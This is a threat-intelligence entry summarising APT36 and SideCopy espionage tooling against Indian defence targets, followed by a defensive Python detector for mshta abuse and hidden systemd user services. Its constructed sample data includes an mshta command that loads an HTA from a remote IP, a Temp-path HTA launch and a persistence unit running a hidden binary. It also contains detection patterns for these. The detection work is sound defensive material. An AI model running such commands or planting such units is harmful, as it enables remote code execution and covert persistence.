Espionage Without Noise: Understanding APT36’s Enduring Campaigns
ID: 32b75756-0ffe-5bb8-a745-5201e9bfd616
STIX ID: report--32b75756-0ffe-5bb8-a745-5201e9bfd616
Feed Name: Aryaka
**Executive Summary:** Aryaka Threat Research Labs observed multiple active espionage campaigns by Transparent Tribe (APT36) and the affiliated SideCopy cluster targeting Indian defense and government organizations. On Windows the actors deploy GETA RAT, delivered through LNK/HTA lures and mshta abuse, with XAML deserialization and in-memory execution used to avoid dropping the payload to disk. On Linux they deploy ARES RAT, staged by a Go-based downloader that persists as a systemd user service and performs automated host profiling and exfiltration. An emerging Desk RAT is delivered via a malicious PowerPoint Add-In. These cross-platform, stealthy and persistent tools are built for long-term intelligence collection, which makes cross-platform visibility and behavior-based detection (process lineage, script-host abuse, user-level persistence) more useful than file-hash matching.
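The summary calls for behavioral detection of two of the described techniques: mshta.exe launched from an LNK/explorer chain or a script host with a remote or user-writable HTA, and a systemd user service whose ExecStart points at a binary in a temp or hidden home directory. The following is an added example written for this page, not code from Aryaka or from the report; the process events and unit files are constructed samples, and the paths, host names and unit names in them are assumptions, not indicators from the campaigns.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 style fields). Not real telemetry.
WINDOWS_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://198.51.100.7/d/report.hta'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\user\AppData\Local\Temp\update.hta"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\ui.hta"},  # vendor HTA, should not fire
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n report.docx'},
]

# Remote URL, UNC share, or user-writable staging directory in the HTA argument.
REMOTE_OR_STAGING = re.compile(
    r"(https?://|\\\\[\w.-]+\\|\\AppData\\|\\Temp\\|\\Downloads\\|\\Public\\)", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

def flag_mshta(event):
    """Return the reasons this event looks like mshta abuse; empty list if none."""
    if PureWindowsPath(event["Image"]).name.lower() != "mshta.exe":
        return []
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    reasons = []
    if parent == "explorer.exe":
        reasons.append("mshta spawned by explorer.exe (consistent with an LNK double-click)")
    elif parent in SCRIPT_HOSTS:
        reasons.append(f"mshta spawned by script host {parent}")
    if REMOTE_OR_STAGING.search(event["CommandLine"]):
        reasons.append("HTA loaded from a remote URL or user-writable staging path")
    return reasons

def scan_events(events):
    """Map each flagged event's command line to its reasons."""
    return {e["CommandLine"]: r for e in events if (r := flag_mshta(e))}

# Constructed contents of unit files under ~/.config/systemd/user/. Not real samples.
USER_UNITS = {
    "/home/analyst/.config/systemd/user/sync-agent.service": (
        "[Unit]\nDescription=Sync Agent\n\n[Service]\n"
        "ExecStart=/home/analyst/.cache/.sync/agent --daemon\nRestart=always\n\n"
        "[Install]\nWantedBy=default.target\n"),
    "/home/analyst/.config/systemd/user/pulseaudio.service": (
        "[Unit]\nDescription=Sound Service\n\n[Service]\n"
        "ExecStart=/usr/bin/pulseaudio --daemonize=no\n\n[Install]\nWantedBy=default.target\n"),
}
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")

def parse_unit(text):
    """Minimal INI-style parser for unit files (no line continuations or drop-ins)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections

def flag_user_unit(path, text):
    """Return the reasons this user unit looks like persistence; empty list if none."""
    exec_start = parse_unit(text).get("Service", {}).get("ExecStart", "")
    argv = exec_start.lstrip("-@:+!").split()   # drop systemd's ExecStart prefix characters
    if not argv:
        return []
    binary = argv[0]
    home = str(PurePosixPath(path).parents[3])  # .../.config/systemd/user/x -> home dir
    reasons = []
    if binary.startswith(WORLD_WRITABLE):
        reasons.append(f"ExecStart binary in a world-writable directory: {binary}")
    if binary.startswith(home + "/"):
        parts = PurePosixPath(binary).relative_to(home).parts[:-1]
        if any(p.startswith(".") for p in parts):
            reasons.append(f"ExecStart binary under a hidden directory in the home: {binary}")
    return reasons

def scan_user_units(units):
    """Map each flagged unit path to its reasons."""
    return {p: r for p, t in units.items() if (r := flag_user_unit(p, t))}

if __name__ == "__main__":
    for cmd, why in scan_events(WINDOWS_EVENTS).items():
        print("WIN ", cmd, "->", "; ".join(why))
    for path, why in scan_user_units(USER_UNITS).items():
        print("LNX ", path, "->", "; ".join(why))
```

In production the Windows half would run over EDR or Sysmon process-creation telemetry and the Linux half over a periodic inventory of `~/.config/systemd/user/*.service` for every interactive user (root-owned units under `/etc/systemd/system` are a separate, better-monitored location). Both checks key on behavior rather than hashes, which is the point the summary makes about these toolsets.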
